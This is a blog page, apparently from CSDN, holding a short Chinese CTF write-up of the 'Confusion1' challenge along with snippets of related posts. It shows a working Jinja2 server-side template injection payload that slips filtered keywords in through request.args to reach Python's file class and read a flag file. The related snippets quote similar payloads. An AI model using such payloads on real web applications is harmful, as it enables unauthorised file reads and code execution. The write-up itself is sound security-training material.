攻防世界--Confusion1

最新推荐文章于 2025-02-07 23:44:36 发布

Uzero.

最新推荐文章于 2025-02-07 23:44:36 发布

阅读量519

点赞数

文章标签： flask ctf

本文链接：https://blog.csdn.net/qq_46263951/article/details/122525656

版权

本文介绍了一种利用服务器侧模板注入(SSTI)漏洞的方法，并通过具体案例展示了如何构造payload来读取服务器上的文件。该过程涉及对Flask框架的理解及利用request全局对象进行攻击。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

进入页面看到给出一个目录

访问后给出flag的目录

测试发现存在SSTI漏洞

发现存在过滤

但是并未过滤request，request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象(flask.request ) " 。

利用file类读取文件

最终payload：

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Uzero.

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

攻防世界 web高手进阶区 7分题Confusion1

闵行小鱼塘

10-11

3057

继续ctf的旅程，开始攻防世界web高手进阶区的7分题，本文是Confusion1的writeup

2025.2.8——二、Confusion1 SSTI模板注入|Jinja2模板

最新发布

2402_87387800的博客

02-10

955

题目来源：攻防世界 Confusion1。

参与评论您还未登录，请先登录后发表或查看评论

攻防世界-Confusion1

m0_49025459的博客

02-14

678

访问题目场景某天，Bob说：PHP是最好的语言，但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候，我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道，这个网址是python写的，那python语言书写的网址，存在最多的大概率是SSTI模板注入。

【攻防世界】Confusion1

wangzhemvp的博客

04-09

688

request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单，进行沙箱逃逸。php的标志是大象，Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显，ssti。过滤了关键字，并未过滤request。点进register.php。

攻防世界Confusion1

qq_43774856的博客

12-09

849

Confusion1 打开链接，如图所示点击login，发现无法访问，查看一下源码，有flag的信息看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了经过测试，过滤了很多关键字，如class，subclasses等。这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[

攻防世界 web高手进阶区 10分题Confusion2

闵行小鱼塘

10-13

1157

继续ctf的旅程，开始攻防世界web高手进阶区的10分题，本文是Confusion2的writeup

攻防世界web高手进阶wp-Confusion1

Whaocai的博客

08-03

374

考点：python ssti 点进去看到url是index.php，页面上有一张图片，蛇和象。我们都知道蛇代表php，大象代表python，猜测有关php+python的题点击login和register，发现都报错。F12又发现了flag文件存放的位置，接下来就是考虑何如读取到该文件。寻找别的信息，看看有没有robots.txt，发现没有该文件，御剑扫描也没扫出什么有用的信息。 ctf中出有关python的题型很大一部分是ssti，于是就尝试模板注入，发下确实存在ssti漏洞，这下就有思路来读取fla

攻防世界-web高手进阶区

zji

04-25

6829

文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结攻防世界-web高手进阶区提示：这里是记录web的题目，这里我基本不讲很多细节，请自行下载Burpsuite，web使用的等等工具。一、baby_web 非常的简单，bp抓包直接把1.php去掉后，就看的flag了。二、Training-WWW-Robots 非常的简单，点网页进去后，看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php，在

WriteUp-攻防世界-MISC Become_a_Rockstar

weixin_57806437的博客

05-27

1262

附件为Become_a_Rockstar.rock Leonard Adleman says star Problem Makers is Problem Makers Problem Makers says NCTF{ God takes World A boy says flag The boy is Bob Evil takes your mind A girl says no flag The girl is Alice Truths were ctf hoster violently F

攻防世界Web：Confusion1

Light_inthe_eyes的博客

10-17

249

打开页面，看见一张图片，点击Home、Login、Register都没用：看看源代码，在Register.php中发现一点提示：但没什么思路，去网上看了看WP，觉得这道题的提示就很扯，那张图片提示了是SSTI？！就因为图片是蛇吞象意味着python干掉php？！想了想，是我还不够头脑风暴，那就按着这个思路往下做吧，简单测试一下： payload：{{''.__class__.__mro__[2].__subclasses__()}}，发现不行，也许是过滤了某些字符吧: 但没有过滤request，re

攻防世界----confusion1

qq_44418229的博客

07-22

1271

攻防世界----confusion1 如何确定是SSTI漏洞；确定后要怎么绕过

攻防世界web进阶区 Confusion1

akxnxbshai的博客

01-24

3654

攻防世界web进阶区 Confusion1 难度系数：四星题目来源： XCTF 4th-QCTF-2018 题目描述：某天，Bob说：PHP是最好的语言，但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候，我发现其存在问题。(请不要使用扫描器) 题目提到了php，打开网址首先看到一张图蛇缠在大象身上猜测此系统使用了php+python （php的标志是大象，Python的标志是蛇）然后进入了注册页面发现flag的位置想到了本题可能存在Python ..

攻防世界 Confusion1

CyhDl666的博客

02-26

321

进入页面 index.php页面查看了源码,没有什么发现进入Login.php页面返回404？？？查看一下源码从这里看可能是个SSTI模板注入这里推荐个初学者的SSTI文章SSTI y 确定是SSTI模板注入按照正常的注入流程{{''.__class__.__mro__}} 页面返回的是从这里来看应该是存在一个过滤想到做过的SSTI题目 shrine用的是url_for函数尝试一下 ...

【攻防世界WEB】难度四星12分进阶题：Confusion1

07-23

830

【攻防世界WEB】四星12分

【愚公系列】2023年05月攻防世界-Web（Confusion1）

时光隧道

05-27

7939

SSTI漏洞（Server Side Template Injection，服务端模板注入漏洞）是一种 web 应用程序中的安全漏洞，它允许攻击者通过在模板中注入恶意代码，执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成，这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码，从而实现任意代码执行，甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞，因为攻击者可以完全控制服务器端执行的代码和结果。

攻防世界-web-Confusion1

wuh2333的博客

11-22

261

攻防世界，web，SSTI

攻防世界web进阶区 Confusion1 之request.args.key

snowlyzz的博客

05-12

687

又是一道新知识点的题收获很大，现在刷的webctf题都是要依靠大佬的wp，唉，还是太菜了。刚进页面就蒙蔽了，什么都不知道。扫了一下目录和git 没有任何线索。。看了下师傅们的WP。点进去index。php 可以看到报错, 看到url url的信息会在页面上看到，猜测是ssTI注入具体可以看：SSTI注入查看下源 FLAG文件显示出位置一般来说 SSTI的注入payload都是 {{"".__class__.__mro__[2].__subclasses__()[4...

3.攻防世界 Confusion1（服务器模板注入SSTI）

2401_86760082的博客

02-07

1007

SSTI(服务器模板注入)漏洞基本概念产生原因攻击原理检测方法测试是Jinja2模板原理利用getattr函数 Flask 框架特点主要组件应用场景

为我写一段代码，显示一个模型的F1-score 和confusion matrix

05-20

好的，以下是一个示例代码，可以显示一个模型的F1-score和confusion matrix： ```python from sklearn.metrics import f1_score, confusion_matrix # 假设我们有真实标签 true_labels 和模型预测结果 predicted_...